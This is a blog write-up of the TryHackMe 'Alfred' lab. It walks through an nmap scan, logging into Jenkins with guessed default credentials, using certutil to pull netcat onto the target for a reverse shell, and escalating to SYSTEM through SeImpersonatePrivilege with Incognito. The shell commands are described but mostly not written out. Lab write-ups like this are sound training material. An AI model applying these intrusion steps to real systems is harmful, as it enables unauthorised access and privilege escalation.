TryHackme: Alfred — Writeup

4 min readMay 13, 2020

Step by step without metasploit

Hi,

This is my first post after a long time and the first in English

Exploit Jenkins to gain an initial shell, then escalate your privileges by exploiting Windows authentication tokens.

Initical Access

Scanning

First, runing nmap to check port and services

nmap -sV -A -Pn 5000 10.10.15.36 -T5

I got tree ports 80,8080,3389

Just check http://10.10.15.36, the following image appears,

Based on the title of the room, directly accessed http://10.10.15.36:8080 honestly don’t try brute force attack, my first attempt was alfred as user, but then try admin and password 123456, lastly the famous admin / adminand here we go!

Jenkins Control panel

Trymehack provides you with a couple of help to find the execution of the code, first try with ipcofing then build an check console output.

I started a web service with python, to transfer files, executing commands from the jenkins console

I used certutil to download netcat, it was copied to the temporary directory

Successful transfer!

Run the following command to get a reverse shell

Access gained!

check user.txt

Privilege Escalation

This room is focused on token impersonation, I check a Privilege SeImpersonatePrivilege

The SeImpersonatePrivilege is described on MSDN as “User Right: Impersonatea client after authentication.”

I use incognito to escalate privileges

Incognito v2.0 actually implements exploitation of one of these cases already. If an account is not an Administrative user but has been granted SeDebugPrivilege and SeImpersonatePrivilege then Incognito v2.0 will automatically enable these privileges and use them to gain access to all tokens and so effectively escalate the SYSTEM. I don’t expect it will be particularly common to find this situation in practice but it may prove useful.https://labs.f-secure.com/archive/incognito-v2-0-released/